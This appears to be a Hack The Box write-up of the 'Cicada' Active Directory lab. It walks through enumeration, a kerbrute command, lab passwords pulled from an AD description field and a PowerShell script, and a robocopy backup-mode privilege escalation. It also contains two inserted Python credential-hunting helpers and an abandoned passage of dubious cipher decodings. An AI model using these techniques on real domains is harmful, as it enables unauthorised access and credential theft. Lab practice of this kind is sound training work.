Cicada Write-Up - HTB

Starting with an nmap scan to discover open ports:

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-04-23 00:52:29Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after:  2025-08-22T20:24:16
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after:  2025-08-22T20:24:16
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after:  2025-08-22T20:24:16
|_ssl-date: TLS randomness does not represent time
3269/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after:  2025-08-22T20:24:16
|_ssl-date: TLS randomness does not represent time
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
53185/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: CICADA-DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: 6h59m59s
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2025-04-23T00:53:19
|_  start_date: N/A

We have a DC ahead: Kerberos, LDAP, global catalog and SMB are all exposed. SMB and LDAP are the primary enumeration targets. Two details from the host scripts matter later: SMB message signing is required, so NTLM relay against this host is off the table, and the clock skew is almost 7 hours, so any Kerberos-based tooling needs the attacker clock synced to the DC (Kerberos tolerates 5 minutes of skew by default).
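As an added example (not part of the original write-up), here is a small Python helper that parses the nmap output above and pulls out the decisions a practitioner makes from it: whether the host is a domain controller, the domain name, clock skew measured against Kerberos' five-minute tolerance, and whether required SMB signing rules out relaying. The embedded scan text is the page's own output, trimmed; the function names, the DC port set and the skew threshold are my own assumptions.

```python
import re

# Sample input: the port and host-script lines from the write-up's nmap scan,
# trimmed to what the parser needs (embedded so this runs offline).
SAMPLE_NMAP = """\
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-04-23 00:52:29Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
636/tcp   open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
3269/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
Host script results:
|_clock-skew: 6h59m59s
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled and required
"""

PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+open\s+(\S+)\s*(.*)$")
SKEW_RE = re.compile(r"clock-skew:\s*(-?)(?:(\d+)h)?(?:(\d+)m)?(?:(\d+)s)?")
# nmap prints the LDAP domain with a stray "0." suffix on this box; strip it.
DOMAIN_RE = re.compile(r"Domain:\s*(\S+?)0?\.?,")

# Assumption: this set of open ports is enough to call the host a DC.
DC_PORTS = {88, 389, 445, 464, 636, 3268, 3269}
KERBEROS_MAX_SKEW_S = 300  # default Kerberos clock tolerance (5 minutes)


def parse_nmap(text):
    """Return open ports, LDAP domain, clock skew (seconds) and SMB signing state."""
    ports, skew_s, signing_required, domain = {}, None, False, None
    for line in text.splitlines():
        m = PORT_RE.match(line.strip())
        if m:
            ports[int(m.group(1))] = (m.group(3), m.group(4))
            dm = DOMAIN_RE.search(m.group(4))
            if dm and domain is None:
                domain = dm.group(1)
            continue
        m = SKEW_RE.search(line)
        if m:
            sign = -1 if m.group(1) else 1
            h, mi, s = (int(x) if x else 0 for x in m.groups()[1:])
            skew_s = sign * (h * 3600 + mi * 60 + s)
        if "Message signing enabled and required" in line:
            signing_required = True
    return {"ports": ports, "skew_s": skew_s,
            "signing_required": signing_required, "domain": domain}


def assess(scan):
    """Turn the parsed scan into the notes a tester writes before touching the host."""
    findings = []
    open_ports = set(scan["ports"])
    if DC_PORTS <= open_ports:
        findings.append("domain controller: Kerberos, LDAP, GC and SMB all exposed")
    if scan["domain"]:
        findings.append(f"domain name from LDAP banner: {scan['domain']}")
    if 88 in open_ports and scan["skew_s"] is not None \
            and abs(scan["skew_s"]) > KERBEROS_MAX_SKEW_S:
        findings.append("clock skew exceeds Kerberos tolerance: sync time before Kerberos auth")
    if 445 in open_ports and scan["signing_required"]:
        findings.append("SMB signing required: NTLM relay to SMB on this host is not an option")
    if 5985 in open_ports:
        findings.append("WinRM (5985) open: valid creds may give a shell via evil-winrm")
    return findings


if __name__ == "__main__":
    for f in assess(parse_nmap(SAMPLE_NMAP)):
        print("-", f)
```

The skew check is the one that bites most often: kerbrute and impacket's Kerberos paths fail with KRB_AP_ERR_SKEW when the attacker clock is hours off, which is exactly the situation this scan reports.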

SMB:

We have two interesting shares: DEV and HR.

Let's see what's inside the file we find there!

We have the password piece; now we are missing the username piece of the puzzle. I decided to run kerbrute to enumerate valid usernames in the domain:

kerbrute userenum --dc cicada.htb -d cicada.htb /usr/share/seclists/Usernames/xato-net-10-million-usernames.tx

Unfortunately, this doesn't give us much:

I now start thinking about the password itself... This string looks like a cipher! Given the box name is Cicada... Hmm, I love this.

So we have: Cicada$M6Corpb+QLp#nZp!8

It's interesting: this is a combination of real words and obfuscated/random strings. Take M6 for example, which could stand for March 6, or Marketing 6 Corp b. Hmm.

Cicada 3301 Tradecraft Considerations:

  • Null Cipher: extract uppercase letters from the obfuscated core:
    L Z → positions 12 & 26 → 12+26=38 → 38th ASCII = '&' (not useful)

  • Base58 Encoding (BTC address format):
    spBLgnbZp → decodes to raw bytes 1A 9C F3 (invalid UTF-8)

  • Vigenère Cipher (key="CICADA"):
    Decrypted: 8jW!q2sD → doesn't resolve

I realized I was running in circles; it can't be a cipher. I reverted to something easier in the meantime: more user enumeration. This time through:

Made a list:

CICADA-DC$
john.smoulder
sarah.dantelia
michael.wrightson
david.orelious
emily.oscars

Output returned:

I tried running evil-winrm, but it seems we are not allowed to connect with this user (no Remote Management Users membership). Maybe the company didn't apply all the rights yet 🥁

Tried running BloodHound to see what we have, but I realized there must be a chain here... PsExec didn't work either.

So I was thinking of doing some thorough RPC queries with michael's creds. The description attribute is a classic place for leftover secrets, and rpcclient's queryuser prints it:

rpcclient $> queryuser david.orelious
        User Name   :   david.orelious
        Full Name   :
        Home Drive  :
        Dir Drive   :
        Profile Path:
        Logon Script:
        Description :   Just in case I forget my password is aRt$Lp#7t*VQ!3
        Workstations:
        Comment     :
        Remote Dial :
        Logon Time               :      Fri, 15 Mar 2024 08:32:22 EET
        Logoff Time              :      Thu, 01 Jan 1970 02:00:00 EET
        Kickoff Time             :      Thu, 14 Sep 30828 05:48:05 EEST
        Password last set Time   :      Thu, 14 Mar 2024 14:17:30 EET
        Password can change Time :      Fri, 15 Mar 2024 14:17:30 EET
        Password must change Time:      Thu, 14 Sep 30828 05:48:05 EEST
        unknown_2[0..31]...
        user_rid :      0x454
        group_rid:      0x201
        acb_info :      0x00000210
        fields_present: 0x00ffffff
        logon_divs:     168
        bad_password_count:     0x00000000
        logon_count:    0x00000000
        padding1[0..7]...
        logon_hrs[0..21]...

Just in case I don't forget his password!

Crispy!

The file contains:

$sourceDirectory = "C:\smb"
$destinationDirectory = "D:\Backup"

$username = "emily.oscars"
$password = ConvertTo-SecureString "Q!3@Lp#M6b*7t*Vt" -AsPlainText -Force
$credentials = New-Object System.Management.Automation.PSCredential($username, $password)
$dateStamp = Get-Date -Format "yyyyMMdd_HHmmss"
$backupFileName = "smb_backup_$dateStamp.zip"
$backupFilePath = Join-Path -Path $destinationDirectory -ChildPath $backupFileName
Compress-Archive -Path $sourceDirectory -DestinationPath $backupFilePath
Write-Host "Backup completed successfully. Backup file saved to: $backupFilePath"

A new combination found: emily.oscars - Q!3@Lp#M6b*7t*Vt
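Both credentials on this box were sitting in plain text: one in a user's AD description attribute (the queryuser output above) and one hard-coded in the backup script. As an added example that is not part of the write-up, here is a Python helper that hunts for password-looking tokens in rpcclient queryuser output and in PowerShell scripts. The sample inputs are constructed from the strings quoted above, and the character-class heuristic, pattern list and function names are my own assumptions.

```python
import re

# Constructed sample: two rpcclient queryuser blocks, the first modelled on the
# david.orelious output above, the second benign.
SAMPLE_RPCCLIENT = """\
        User Name   :   david.orelious
        Full Name   :
        Description :   Just in case I forget my password is aRt$Lp#7t*VQ!3
        Logon Time               :      Fri, 15 Mar 2024 08:32:22 EET
        user_rid :      0x454
        User Name   :   emily.oscars
        Full Name   :   Emily Oscars
        Description :   Backup operator, see ticket 2024-0314
        user_rid :      0x641
"""

# Constructed sample: the credential lines from the backup script above.
SAMPLE_PS1 = """\
$sourceDirectory = "C:\\smb"
$username = "emily.oscars"
$password = ConvertTo-SecureString "Q!3@Lp#M6b*7t*Vt" -AsPlainText -Force
$credentials = New-Object System.Management.Automation.PSCredential($username, $password)
"""


def looks_like_password(token, min_len=8, min_classes=3):
    """Heuristic: long enough and mixes at least min_classes of lower/upper/digit/symbol."""
    if len(token) < min_len:
        return False
    classes = sum([
        any(c.islower() for c in token),
        any(c.isupper() for c in token),
        any(c.isdigit() for c in token),
        any(not c.isalnum() for c in token),
    ])
    return classes >= min_classes


# Free-text attributes that rpcclient prints and that admins tend to abuse for notes.
RPC_TEXT_FIELDS = {"Description", "Comment", "Full Name"}


def find_secrets_in_rpcclient(text):
    """Return (user, field, token) for every password-looking token in queryuser output."""
    hits, user = [], None
    for line in text.splitlines():
        key, _, value = line.partition(":")   # first ':' separates field from value
        key, value = key.strip(), value.strip()
        if key == "User Name":
            user = value
        elif key in RPC_TEXT_FIELDS and value:
            for tok in value.split():
                if looks_like_password(tok):
                    hits.append((user, key, tok))
    return hits


# Patterns for credentials embedded in PowerShell: plaintext SecureString
# construction, and string assignment to a password-named variable.
PS_SECRET_PATTERNS = [
    re.compile(r'ConvertTo-SecureString\s+"([^"]+)"\s+-AsPlainText', re.I),
    re.compile(r'\$(?:password|passwd|pwd|secret)\w*\s*=\s*"([^"]+)"', re.I),
]
PS_USER_RE = re.compile(r'\$user(?:name)?\s*=\s*"([^"]+)"', re.I)


def find_secrets_in_powershell(script):
    """Return (username, secret) pairs for hard-coded credentials in a script."""
    um = PS_USER_RE.search(script)
    user = um.group(1) if um else None
    hits = []
    for pat in PS_SECRET_PATTERNS:
        for m in pat.finditer(script):
            hit = (user, m.group(1))
            if looks_like_password(m.group(1)) and hit not in hits:
                hits.append(hit)
    return hits


if __name__ == "__main__":
    print(find_secrets_in_rpcclient(SAMPLE_RPCCLIENT))
    print(find_secrets_in_powershell(SAMPLE_PS1))
```

Pipe a loop of `rpcclient -c "queryuser <rid>"` output (or an ldapsearch dump of the description attribute) through the first function and any share-hosted .ps1 files through the second; the heuristic is deliberately loose, so review the hits by hand.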

Cicada 3301, foothold: completed! We are about to be recruited by a top-secret organization now. Prepare.

Let's first check our local privileges by running whoami /all:

USER INFORMATION
----------------

User Name           SID
=================== =============================================
cicada\emily.oscars S-1-5-21-917908876-1423158569-3159038727-1601


GROUP INFORMATION
-----------------

Group Name                                 Type             SID          Attributes
========================================== ================ ============ ==================================================
Everyone                                   Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Backup Operators                   Alias            S-1-5-32-551 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users            Alias            S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                              Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Certificate Service DCOM Access    Alias            S-1-5-32-574 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias            S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                       Well-known group S-1-5-2      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users           Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization             Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication           Well-known group S-1-5-64-10  Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level       Label            S-1-16-12288


PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeBackupPrivilege             Back up files and directories  Enabled
SeRestorePrivilege            Restore files and directories  Enabled
SeShutdownPrivilege           Shut down the system           Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled


USER CLAIMS INFORMATION
-----------------------

User claims unknown.

Kerberos support for Dynamic Access Control on this device has been disabled.

SeBackupPrivilege is enabled in the token (emily is a member of BUILTIN\Backup Operators). Game over: with backup semantics, reads bypass the ACL on the target, so any file on disk can be copied.

Really easy stuff here; we won't spend time dumping NTDS.dit or creating a shadow copy. We will directly "back up" the root flag with robocopy's /b (backup mode) switch :)

robocopy c:\users\administrator\desktop "C:\users\public\downloads" root.txt /mt /z /b

Cool machine. Easy af.
